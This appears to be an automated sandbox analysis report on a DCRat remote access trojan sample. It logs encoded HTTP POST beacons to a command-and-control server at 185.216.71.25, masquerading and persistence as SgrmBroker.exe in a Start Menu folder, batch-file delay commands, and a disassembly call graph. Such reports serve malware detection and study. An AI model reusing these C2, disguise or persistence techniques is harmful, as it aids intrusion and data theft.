Jan 3, 2025 09:10:11.716836929 CET | 49746 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:11.721666098 CET | 80 | 49746 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:11.721735001 CET | 49746 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:11.722014904 CET | 49746 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:11.726764917 CET | 80 | 49746 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:12.069082975 CET | 49746 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:12.073851109 CET | 80 | 49746 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:33.122565985 CET | 80 | 49746 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:33.122778893 CET | 49746 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:33.136131048 CET | 49746 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:33.140978098 CET | 80 | 49746 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:38.017051935 CET | 49369 | 53 | 192.168.2.6 | 162.159.36.2
Jan 3, 2025 09:10:38.021914005 CET | 53 | 49369 | 162.159.36.2 | 192.168.2.6
Jan 3, 2025 09:10:38.022180080 CET | 49369 | 53 | 192.168.2.6 | 162.159.36.2
Jan 3, 2025 09:10:38.026983023 CET | 53 | 49369 | 162.159.36.2 | 192.168.2.6
Jan 3, 2025 09:10:38.487267971 CET | 49369 | 53 | 192.168.2.6 | 162.159.36.2
Jan 3, 2025 09:10:38.492316008 CET | 53 | 49369 | 162.159.36.2 | 192.168.2.6
Jan 3, 2025 09:10:38.492372990 CET | 49369 | 53 | 192.168.2.6 | 162.159.36.2
Jan 3, 2025 09:10:39.174319029 CET | 49377 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:39.179143906 CET | 80 | 49377 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:39.179214954 CET | 49377 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:39.185646057 CET | 49377 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:39.190401077 CET | 80 | 49377 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:10:39.540816069 CET | 49377 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:10:39.545636892 CET | 80 | 49377 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:00.557622910 CET | 80 | 49377 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:00.557774067 CET | 49377 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:00.564135075 CET | 49377 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:00.568950891 CET | 80 | 49377 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:10.932816982 CET | 49430 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:10.938052893 CET | 80 | 49430 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:10.938163042 CET | 49430 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:10.938472986 CET | 49430 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:10.944188118 CET | 80 | 49430 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:11.287338972 CET | 49430 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:11.292490959 CET | 80 | 49430 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:32.304397106 CET | 80 | 49430 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:32.304488897 CET | 49430 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:32.310494900 CET | 49430 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:32.315294981 CET | 80 | 49430 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:38.220307112 CET | 49431 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:38.226095915 CET | 80 | 49431 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:38.226217031 CET | 49431 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:38.226459026 CET | 49431 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:38.231234074 CET | 80 | 49431 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:38.584213972 CET | 49431 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:38.589014053 CET | 80 | 49431 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:59.621268034 CET | 80 | 49431 | 185.216.71.25 | 192.168.2.6
Jan 3, 2025 09:11:59.621339083 CET | 49431 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:59.627343893 CET | 49431 | 80 | 192.168.2.6 | 185.216.71.25
Jan 3, 2025 09:11:59.632116079 CET | 80 | 49431 | 185.216.71.25 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 3, 2025 09:10:38.015290022 CET | 53 | 52658 | 162.159.36.2 | 192.168.2.6
Jan 3, 2025 09:10:38.660548925 CET | 53 | 61963 | 1.1.1.1 | 192.168.2.6
                                    • 185.216.71.25
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49746 | 185.216.71.25 | 80 | 7160 | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:10:11.722014904 CET | 286 | OUT | POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 185.216.71.25
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Jan 3, 2025 09:10:12.069082975 CET | 344 | OUT | Data Raw: 00 06 01 00 06 0c 04 00 05 06 02 01 02 0c 01 06 00 05 05 0b 02 03 03 09 00 01 0c 0d 07 04 00 06 0d 02 06 59 07 04 06 51 0c 51 02 0a 04 04 07 54 05 02 0c 5b 0d 55 05 04 01 02 06 03 04 52 05 58 01 07 0f 01 04 07 05 06 0c 05 0c 00 0d 51 0e 04 02 00
                                    Data Ascii: YQQT[URXQQ\L~|Nzw\[Bv[oR|oewU`|sh{|pZx^TD|}sSwdh}O~V@{mnL~Lu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49377 | 185.216.71.25 | 80 | 1488 | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:10:39.185646057 CET | 321 | OUT | POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 185.216.71.25
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Jan 3, 2025 09:10:39.540816069 CET | 344 | OUT | Data Raw: 00 06 01 07 03 08 04 07 05 06 02 01 02 0c 01 05 00 06 05 0c 02 03 03 09 03 02 0f 00 04 53 03 52 0f 01 04 01 07 03 04 57 0f 53 05 0a 00 03 06 0e 05 05 0d 0d 0d 02 04 02 05 57 03 05 04 0a 00 0c 00 56 0a 0f 07 02 04 07 0c 57 0b 01 0c 03 0b 03 04 07
                                    Data Ascii: SRWSWVWWQP\L}Rh^~Nw\}Ov\kP~obX`BZ~shoRlNbI}mh@tIxN~_~V@{Sb~Lu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49430 | 185.216.71.25 | 80 | 1864 | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:11:10.938472986 CET | 286 | OUT | POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 185.216.71.25
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Jan 3, 2025 09:11:11.287338972 CET | 344 | OUT | Data Raw: 05 05 01 05 06 0c 01 0a 05 06 02 01 02 0c 01 02 00 00 05 09 02 07 03 0b 07 06 0d 57 06 57 01 55 0f 0e 05 0b 03 54 05 05 0d 03 07 57 06 06 05 53 05 00 0e 01 0e 05 04 52 07 03 04 53 04 51 07 01 03 06 0d 0b 07 54 01 06 0e 52 0c 55 0c 07 0d 09 04 03
                                    Data Ascii: WWUTWSRSQTRU_WTT\L~@h^~cb_BaepkUuMvlxMUYx`^oYfKknh`Y^}e~V@xmzN}L}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49431 | 185.216.71.25 | 80 | 5372 | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:11:38.226459026 CET | 321 | OUT | POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
                                    Content-Type: application/octet-stream
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 185.216.71.25
                                    Content-Length: 336
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Jan 3, 2025 09:11:38.584213972 CET | 336 | OUT | Data Raw: 05 07 01 00 06 08 04 00 05 06 02 01 02 05 01 01 00 0b 05 0e 02 04 03 0a 00 03 0d 0c 07 03 01 00 0e 03 05 0b 01 00 04 0b 0e 51 02 04 07 05 06 06 07 04 0f 0f 0e 05 04 07 07 02 06 06 05 04 05 0c 02 50 0d 0f 07 01 05 01 0d 06 0b 0e 0e 03 0b 08 04 05
                                    Data Ascii: QPT]WPP\L~A~pf@wq}LvetABz^wB{]hZ|J{RQo^zKhSwScgx~e~V@Az}nA}_y


                                    Target ID:0
                                    Start time:03:09:53
                                    Start date:03/01/2025
                                    Path:C:\Users\user\Desktop\onlysteal.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\onlysteal.exe"
                                    Imagebase:0x230000
                                    File size:1'011'382 bytes
                                    MD5 hash:8F81AC89B9F6DBCCF07A86AF59FAA6BA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:03:09:53
                                    Start date:03/01/2025
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe"
                                    Imagebase:0x4f0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:03:09:59
                                    Start date:03/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:03:09:59
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:03:09:59
                                    Start date:03/01/2025
                                    Path:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Intorefnet/hyperBlockCrtCommon.exe"
                                    Imagebase:0xc80000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 83%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:6
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:03:10:01
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping -n 10 localhost
                                    Imagebase:0x7ff7a8c20000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:03:10:10
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0x120000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 83%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:13
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:03:10:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\w32tm.exe
                                    Wow64 process (32bit):false
                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Imagebase:0x7ff784b20000
                                    File size:108'032 bytes
                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:03:10:37
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0xee0000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:03:11:00
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping -n 10 localhost
                                    Imagebase:0x7ff7a8c20000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:03:11:09
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0x4b0000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:03:11:31
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
                                    Imagebase:0x7ff660910000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:03:11:31
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:03:11:31
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6403a0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:03:11:32
                                    Start date:03/01/2025
                                    Path:C:\Windows\System32\w32tm.exe
                                    Wow64 process (32bit):false
                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Imagebase:0x7ff784b20000
                                    File size:108'032 bytes
                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:03:11:37
                                    Start date:03/01/2025
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                    Imagebase:0x9f0000
                                    File size:689'664 bytes
                                    MD5 hash:88475FFCF70BAFDA27644064BD214F2A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                      Execution Graph

                                      Execution Coverage:9.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:9.3%
                                      Total number of Nodes:1512
                                      Total number of Limit Nodes:28
24185->24218 24188 2395be 24187->24188 24193 2395cf 24187->24193 24189 2395d1 24188->24189 24190 2395ca 24188->24190 24188->24193 24224 239620 24189->24224 24219 23974e 24190->24219 24193->24151 24196 239bdc 24194->24196 24198 239be3 24194->24198 24195 239785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24195->24198 24196->24128 24198->24195 24198->24196 24239 236d1a 77 API calls 24198->24239 24199->24128 24200->24125 24201->24131 24202->24131 24203->24131 24204->24131 24205->24131 24206->24131 24207->24136 24208->24140 24209->24135 24211 23bb10 _wcslen 24210->24211 24212 23bbb8 GetCurrentDirectoryW 24211->24212 24213 23bb39 _wcslen 24211->24213 24212->24213 24213->24158 24214->24169 24215->24173 24216->24177 24217->24180 24218->24184 24220 239781 24219->24220 24223 239757 24219->24223 24220->24193 24223->24220 24230 23a1e0 24223->24230 24225 23962c 24224->24225 24227 23964a 24224->24227 24225->24227 24228 239638 CloseHandle 24225->24228 24226 239669 24226->24193 24227->24226 24238 236bd5 76 API calls 24227->24238 24228->24227 24231 24ec50 24230->24231 24232 23a1ed DeleteFileW 24231->24232 24233 23a200 24232->24233 24234 23977f 24232->24234 24235 23bb03 GetCurrentDirectoryW 24233->24235 24234->24193 24236 23a214 24235->24236 24236->24234 24237 23a218 DeleteFileW 24236->24237 24237->24234 24238->24226 24239->24198 24242 24eb3d ___std_exception_copy 24240->24242 24241 2490d6 24241->23768 24242->24241 24246 24eb59 24242->24246 24249 257a5e 7 API calls 2 library calls 24242->24249 24244 24f5c9 24251 25238d RaiseException 24244->24251 24246->24244 24250 25238d RaiseException 24246->24250 24247 24f5e6 24249->24242 24250->24244 24251->24247 24253 257ce1 _unexpected 24252->24253 24254 257ce8 24253->24254 24255 257cfa 24253->24255 24288 257e2f GetModuleHandleW 24254->24288 24276 25ac31 EnterCriticalSection 24255->24276 24258 257ced 24258->24255 24289 257e73 GetModuleHandleExW 24258->24289 24259 257d9f 24277 257ddf 24259->24277 24263 257d01 24263->24259 24265 
257d76 24263->24265 24297 2587e0 20 API calls _abort 24263->24297 24266 257d8e 24265->24266 24270 258a91 _abort 5 API calls 24265->24270 24271 258a91 _abort 5 API calls 24266->24271 24267 257dbc 24280 257dee 24267->24280 24268 257de8 24298 262390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24268->24298 24270->24266 24271->24259 24276->24263 24299 25ac81 LeaveCriticalSection 24277->24299 24279 257db8 24279->24267 24279->24268 24300 25b076 24280->24300 24283 257e1c 24286 257e73 _abort 8 API calls 24283->24286 24284 257dfc GetPEB 24284->24283 24285 257e0c GetCurrentProcess TerminateProcess 24284->24285 24285->24283 24287 257e24 ExitProcess 24286->24287 24288->24258 24290 257ec0 24289->24290 24291 257e9d GetProcAddress 24289->24291 24293 257ec6 FreeLibrary 24290->24293 24294 257ecf 24290->24294 24292 257eb2 24291->24292 24292->24290 24293->24294 24295 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24294->24295 24296 257cf9 24295->24296 24296->24255 24297->24265 24299->24279 24301 25b09b 24300->24301 24304 25b091 24300->24304 24302 25ac98 _unexpected 5 API calls 24301->24302 24302->24304 24303 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24305 257df8 24303->24305 24304->24303 24305->24283 24305->24284 25435 241bbd GetCPInfo IsDBCSLeadByte 25436 25b1b8 27 API calls 3 library calls 25392 24c793 102 API calls 5 library calls 25438 249580 6 API calls 25440 24b18d 78 API calls 25393 24c793 97 API calls 4 library calls 24323 2313e1 84 API calls 2 library calls 24324 24eae7 24325 24eaf1 24324->24325 24326 24e85d ___delayLoadHelper2@8 14 API calls 24325->24326 24327 24eafe 24326->24327 25395 24f4e7 29 API calls _abort 24328 24b7e0 24329 24b7ea __EH_prolog 24328->24329 24496 231316 24329->24496 24332 24bf0f 24561 24d69e 24332->24561 24333 24b82a 24336 24b838 24333->24336 24337 24b89b 24333->24337 24411 24b841 24333->24411 24338 24b83c 24336->24338 24339 24b878 24336->24339 24342 24b92e GetDlgItemTextW 
